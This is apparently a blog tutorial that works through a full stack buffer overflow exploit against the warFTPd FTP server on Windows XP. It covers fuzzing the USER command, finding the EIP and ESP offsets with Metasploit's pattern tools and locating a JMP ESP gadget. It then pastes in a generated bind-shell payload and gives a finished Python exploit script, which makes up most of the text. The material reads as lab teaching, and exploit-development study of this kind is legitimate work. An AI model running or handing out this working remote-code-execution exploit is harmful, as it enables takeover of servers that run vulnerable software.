♋...Learn Harder, Keep Humble, Not For The Fain Heart !, Respect Others, Try Harder...♋

Tuesday, September 18, 2012

Exploit warFTPd Direct RETN "Buffer Overflow"

First, install the warFTPd application and OllyDbg on a Windows system.
Then write a fuzzer in Python, because the application to be exploited is an FTP server. I am using gedit here; any text editor will do.
Type the command # gedit fuzzer.py and enter the code below:



On line 4, the variable buffer holds 1000 "A" characters. One ASCII character is one byte, so 1000 bytes of data are transmitted as the argument of the USER command.
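The fuzzer above sends a single fixed 1000-byte argument. As an added example (not the post's own script), the Python 3 fuzzer below sends USER with an argument that grows in 100-byte steps until the server stops answering, which narrows down the length that crashes it. The host and port are the post's lab values and are assumptions; replace them with your own.

```python
#!/usr/bin/env python3
# Added example, not the original post's fuzzer: send the FTP USER command with a
# growing argument until the server stops answering, to narrow down the crash length.
import socket

HOST = "192.168.56.101"   # the post's warFTP host (assumption: adjust for your lab)
PORT = 21


def user_command(length, filler=b"A"):
    """Build 'USER <filler*length>\\r\\n' exactly as the server receives it.
    FTP commands end with CRLF; a '\\r \\n' with a space in between is not a line end."""
    return b"USER " + filler * length + b"\r\n"


def fuzz_lengths(start=100, stop=2000, step=100):
    """Argument lengths to try, in increasing order (stop is inclusive)."""
    return list(range(start, stop + 1, step))


def send_user(host, port, command, timeout=3.0):
    """Send one USER command; return the server's reply, or None if the connection died."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.recv(1024)            # 220 banner
            s.sendall(command)
            return s.recv(1024)     # '331 ...' if the server is still alive
    except OSError:                 # refused, reset or timed out: the daemon is gone
        return None


def fuzz(host=HOST, port=PORT, lengths=None):
    """Return the first length that got no reply, or None if every length was survived."""
    previous = 0
    for n in lengths or fuzz_lengths():
        print(f"[*] USER with {n} bytes")
        if send_user(host, port, user_command(n)) is None:
            print(f"[!] no reply at {n} bytes: the crash length is between {previous} and {n}")
            return n
        previous = n
    print("[-] server survived every length")
    return None


if __name__ == "__main__":
    fuzz()
```

Restart warFTP between runs if it dies; the length reported is the first one that killed it, which is all the next step (the cyclic pattern) needs.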

Now run warFTP on Windows XP and set it ONLINE.


Next, run the fuzzer with the command # python fuzzer.py and watch what happens to warFTP.


warFTP disappears from the screen. Why? Because the application crashed: the oversized USER argument overflowed a stack buffer and overwrote the saved return address, so the CPU tried to continue execution at a garbage address. The resulting access violation was not handled by the application and Windows terminated the process. No exception handler chain is involved here, which is why this is a direct RETN (return address) overwrite rather than an SEH overwrite.

Now open warFTP in OllyDbg.


Next, run the fuzzer again from the terminal and watch what happens to warFTP in the debugger.


The application crashes again. This time OllyDbg shows the cause: the data sent by the fuzzer has overwritten four registers of the warFTP process, namely:
- ESP
- EDI
- EBP
- EIP
EDI, EBP and EIP contain 0x41414141 (four "A" bytes), and ESP points into the stack area filled with 0x41. Execution cannot continue at 0x41414141, which is why the program crashes; the fact that EIP is under our control is what makes this exploitable.

Now I use pattern_create, a Metasploit tool used in exploit development.
Go to the framework tools directory first: # cd /pentest/exploits/framework/tools/ and ls


Then type the command: ./pattern_create.rb 1000 > string_pattern.txt
Content of string_pattern.txt:
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B

Next, copy the content of string_pattern.txt into fuzzer.py like below:
#!/usr/bin/python
# Python 2 script (str is a byte string, so the buffer can be sent as-is)
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 1000-byte cyclic pattern from pattern_create.rb: every 4-byte window is unique,
# so the value that lands in EIP tells us the offset
buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
#buffer = "\x41" * 1000   # the first fuzzer: 1000 x "A" (0x41)
s.connect(('192.168.56.101', 21))
data = s.recv(1024)                     # 220 banner
print("Sending evil data via USER command . . .")
s.send('USER ' + buffer + '\r\n')       # FTP lines end with CRLF (the original had '\r \n')
data = s.recv(1024)
s.send('PASS ' + '\r\n')
s.close()
print("Finish")

After replacing the buffer with the pattern, run the fuzzer again: open warFTP in OllyDbg, run the fuzzer and look at the registers.


Look at the values in ESP and EIP. EIP is the vital register: it holds the address of the next instruction, so whatever we put there is where execution goes. It now contains 4 bytes of the pattern, and ESP points into the pattern on the stack.
The next step is to find at which byte of the string each register was overwritten, using pattern_offset.rb with the value shown in EIP (and with the first 4 pattern characters ESP points to), like below:


The result shows that 485 bytes are needed to reach EIP (bytes 486 to 489 of the string overwrite the saved return address), and 493 bytes to reach the location on the stack that ESP points to.
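The pattern_offset output itself is only in the screenshot, so as an added example (not part of the post, and not Metasploit's own code) here is a Python 3 re-implementation of pattern_create.rb and pattern_offset.rb. It regenerates the 1000-byte pattern shown above and recovers the offsets 485 and 493 from what OllyDbg displays. The concrete register values used below are derived from the pattern, not taken from the post: the 4 bytes at offset 485 are "1Aq2", which a little-endian 32-bit register shows as 0x32714131, and the bytes at offset 493 are "q4Aq".

```python
#!/usr/bin/env python3
# Added example: a Python re-implementation of Metasploit's pattern_create.rb and
# pattern_offset.rb (not the tools themselves), so the offsets can be reproduced offline.
import itertools
import string
import struct


def pattern_create(length):
    """Cyclic pattern Aa0Aa1Aa2...Az9Ba0... truncated to `length` characters.
    Every 4-byte window is unique for the first 26*26*10*3 = 20280 bytes."""
    chunks = []
    for upper, lower, digit in itertools.product(string.ascii_uppercase,
                                                 string.ascii_lowercase,
                                                 string.digits):
        chunks.append(upper + lower + digit)
        if len(chunks) * 3 >= length:
            break
    return "".join(chunks)[:length]


def pattern_offset(pattern, value):
    """Offset in `pattern` of a 4-byte fragment, or None if it is not there.
    `value` is either an int as read from a 32-bit register (x86 is little-endian,
    so 0x32714131 means the bytes '1','A','q','2' in memory order) or the text seen
    in a memory dump, e.g. the first characters ESP points to."""
    if isinstance(value, int):
        needle = struct.pack("<I", value).decode("latin-1")
    else:
        needle = value
    idx = pattern.find(needle)
    return None if idx == -1 else idx


if __name__ == "__main__":
    p = pattern_create(1000)
    print(p)
    print("EIP 0x32714131 -> offset", pattern_offset(p, 0x32714131))   # 485
    print("ESP -> 'q4Aq'   -> offset", pattern_offset(p, "q4Aq"))       # 493
```

The uniqueness of every 4-byte window is what makes the trick work: a register value maps back to exactly one position in the buffer, as long as the buffer is shorter than 20280 bytes.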

Then customize the fuzzer again to prove that EIP is overwritten by bytes 486, 487, 488 and 489:

#!/usr/bin/python
# Python 2 script: proves that bytes 486-489 of the USER argument land in EIP
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
nilaiEIP = "\x90" * 485                 # 485 bytes of filler (NOP) up to the saved return address
nilaiEIP += "\xEF\xBE\xAD\xDE"          # the 4 bytes that overwrite EIP (0xDEADBEEF, little-endian)
s.connect(('192.168.56.101', 21))
data = s.recv(1024)                     # 220 banner
print("Sending evil data via USER command . . .")
s.send('USER ' + nilaiEIP + '\r\n')     # FTP lines end with CRLF
data = s.recv(1024)
s.send('PASS ' + '\r\n')
s.close()
print("Finish")

The bytes \xEF\xBE\xAD\xDE appended to nilaiEIP show up in EIP as DEADBEEF because x86 is little-endian: the first byte in memory is the least significant byte of the register.

Run warFTP in OllyDbg again, run the fuzzer, and see what happens:


As shown above, the value of EIP has become DEADBEEF.

The next step is to write to the location ESP points to. ESP is the stack pointer: the stack is a temporary data storage area, and once the overwritten return address has been popped, ESP points just past our EIP bytes. If the data we send after the return address lands there, we can place a payload on the stack and reach it through ESP. Customize the fuzzer again like below:


#!/usr/bin/python
# Python 2 script: EIP = DEADBEEF and the rest of the buffer fills the stack from ESP onwards
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "\x90" * 485                   # filler up to the saved return address
buffer += "\xEF\xBE\xAD\xDE"            # EIP (0xDEADBEEF, little-endian)
buffer += "\x90" * (493 - len(buffer))  # 4 more bytes up to the address ESP points to
buffer += "\xCC" * (1000 - len(buffer)) # 507 bytes of INT3 (0xCC) where the payload will go
s.connect(('192.168.56.101', 21))
data = s.recv(1024)                     # 220 banner
print("Sending evil data via USER command . . .")
s.send('USER ' + buffer + '\r\n')       # the original sent the undefined nilaiEIP here
data = s.recv(1024)
s.send('PASS ' + '\r\n')
s.close()
print("Finish")

Open warFTP in OllyDbg again and run the fuzzer.


The result above: EIP is DEADBEEF and ESP points to the 507 bytes of filler (0xCC) on the stack, i.e. the 1000 - 493 bytes sent after the ESP offset.

The next step is to find a JMP ESP instruction. JMP ESP transfers execution to the address held in ESP, so if we put the address of such an instruction into EIP, the CPU jumps into the data we placed on the stack. The instruction has to sit at a fixed address, so take it from a module that is loaded at the same address every time (Windows XP has no ASLR; the post uses shell32.dll). The address is specific to the DLL and OS version, so search for it on your own target rather than copying one from a write-up.
First open the View menu, select Executable modules, then select shell32.dll.


Then right-click in the main (CPU) window, select Search for > Command, and type JMP ESP.


The result:


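The address OllyDbg found is only in the screenshot. As an added example (not the post's method, which used OllyDbg's Search for > Command), the Python 3 script below scans a module's in-memory bytes for the opcode sequences that hand control to ESP (jmp esp, call esp, and push esp; ret) and discards addresses that contain bytes the FTP USER command cannot carry. The module bytes and base address in the script are a constructed sample, not real shell32.dll contents; for a real target, feed it a binary copy of the module from the debugger and the load address shown under Executable modules.

```python
#!/usr/bin/env python3
# Added example, not the post's method (which used OllyDbg's Search for > Command): scan a
# module's bytes for instructions that transfer control to ESP, and discard addresses that
# contain bytes the FTP USER command cannot carry.
import struct

# x86 opcode encodings that end up executing whatever ESP points to
GADGETS = {
    b"\xff\xe4": "jmp esp",
    b"\xff\xd4": "call esp",
    b"\x54\xc3": "push esp; ret",
}


def find_gadgets(image, image_base, badchars=b"\x00\x0a\x0d"):
    """Return sorted [(address, mnemonic)] for every gadget whose address has no bad byte.
    `image` must be the module as laid out in memory (e.g. a binary copy from OllyDbg);
    raw file offsets differ from virtual addresses because of section alignment."""
    hits = []
    for opcode, name in GADGETS.items():
        pos = image.find(opcode)
        while pos != -1:
            addr = image_base + pos
            if not any(b in badchars for b in struct.pack("<I", addr)):
                hits.append((addr, name))
            pos = image.find(opcode, pos + 1)
    return sorted(hits)


def little_endian(addr):
    """Bytes to put in the buffer so that EIP == addr (least significant byte first)."""
    return struct.pack("<I", addr)


# Constructed 64-byte sample at a made-up base; NOT real shell32.dll contents.
SAMPLE_BASE = 0x7c9d10f0
SAMPLE_IMAGE = (b"\x90" * 0x10 + b"\xff\xe4"      # jmp esp       at base+0x10 = 0x7c9d1100 (contains 0x00)
                + b"\x90" * 0x0d + b"\x54\xc3"    # push esp; ret at base+0x1f = 0x7c9d110f
                + b"\x90" * 0x0f + b"\xff\xd4"    # call esp      at base+0x30 = 0x7c9d1120
                + b"\x90" * 0x0e)

if __name__ == "__main__":
    for addr, name in find_gadgets(SAMPLE_IMAGE, SAMPLE_BASE):
        print(f"0x{addr:08x}  {name:14s} -> put {little_endian(addr).hex()} in the buffer")
    # the jmp esp at 0x7c9d1100 is only reported if a NUL byte is allowed:
    print(find_gadgets(SAMPLE_IMAGE, SAMPLE_BASE, badchars=b""))
```

The sample deliberately places one gadget at an address containing 0x00 so the filter has something to reject: the USER argument is handled as a C string, so a NUL in the return address would truncate the buffer before it ever reaches the saved EIP.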
Then customize the fuzzer again: replace \xEF\xBE\xAD\xDE with the address of the JMP ESP instruction, written in little-endian byte order (lowest byte first):


Run warFTP in OllyDbg and then run the fuzzer.


As shown above, everything ran as expected: EIP now holds the JMP ESP address and execution is redirected into our buffer on the stack.

It is time to create the payload. Activate the framework first:
/pentest/exploits/framework2# ./msfweb

Then open the address 127.0.0.1:55555 in a browser and choose a payload.


Fill out the form as below:


Now generate it.

Copy the generated payload code and paste it into the fuzzer, where the 0xCC filler was.


After that, open warFTP and run the fuzzer. The application will crash as before, but this time the payload runs.
Then connect to it with the command: telnet 192.168.56.101 4444
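The final fuzzer with the payload pasted in is only shown as a screenshot. As an added example, not the post's exploit, the Python 3 script below assembles the final USER buffer from the offsets found earlier (485 for EIP, 493 for ESP, 1000 bytes total), packs the return address little-endian, places a NOP sled and the payload where ESP points, and refuses to send a buffer containing \x00, \x0a or \x0d, which would cut the C string or the FTP line short before the overflow happens. The JMP ESP address is a placeholder and the payload is INT3 filler; both are assumptions, to be replaced with the address from your own search and the msfweb-generated shellcode.

```python
#!/usr/bin/env python3
# Added example, not the post's exploit: assemble the final USER buffer from the offsets
# found with pattern_offset, refuse bytes the FTP server would mangle, and send it.
import socket
import struct

EIP_OFFSET = 485      # bytes before the saved return address
ESP_OFFSET = 493      # offset ESP points to when the overwritten RET executes
TOTAL_LEN = 1000      # same length the crash was reproduced with
JMP_ESP = 0x11223344  # PLACEHOLDER (assumption): use the JMP ESP address from your own search
BADCHARS = b"\x00\x0a\x0d"   # NUL ends a C string; CR and LF end the FTP command line

# Stand-in for the msfweb-generated shellcode: INT3 breakpoints, so a debugger stops exactly
# where the real payload would start. Replace with the generated bind-shell bytes.
PAYLOAD = b"\xcc" * 16
NOP_SLED = 16         # a few NOPs before the payload tolerate ESP being off by a few bytes


def check_badchars(data, badchars=BADCHARS):
    """Return [(index, byte)] for every byte of data that the target would corrupt."""
    return [(i, b) for i, b in enumerate(data) if b in badchars]


def build_buffer(jmp_esp=JMP_ESP, payload=PAYLOAD, total_len=TOTAL_LEN):
    """Layout: filler | EIP (JMP ESP, little-endian) | 4 bytes | NOP sled | payload | filler."""
    buf = b"\x90" * EIP_OFFSET
    buf += struct.pack("<I", jmp_esp)            # lowest byte first, as x86 reads it
    buf += b"\x90" * (ESP_OFFSET - len(buf))     # gap between the return address and ESP
    buf += b"\x90" * NOP_SLED
    buf += payload
    if len(buf) > total_len:
        raise ValueError(f"payload too large: {len(buf)} > {total_len} bytes")
    buf += b"\x90" * (total_len - len(buf))
    bad = check_badchars(buf)
    if bad:
        raise ValueError(f"bad characters in buffer at {bad}; re-encode the payload")
    return buf


def exploit(host="192.168.56.101", port=21):
    """Send the buffer as the USER argument (host is the post's lab address)."""
    buf = build_buffer()
    with socket.create_connection((host, port), timeout=5) as s:
        s.recv(1024)                             # 220 banner
        s.sendall(b"USER " + buf + b"\r\n")
    print(f"sent {len(buf)} bytes; if the payload is a bind shell: telnet {host} 4444")


if __name__ == "__main__":
    exploit()
```

Keeping the total length at 1000 bytes matters: the crash was reproduced with that size, and a different length can change what ends up on the stack around ESP.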


Finish,
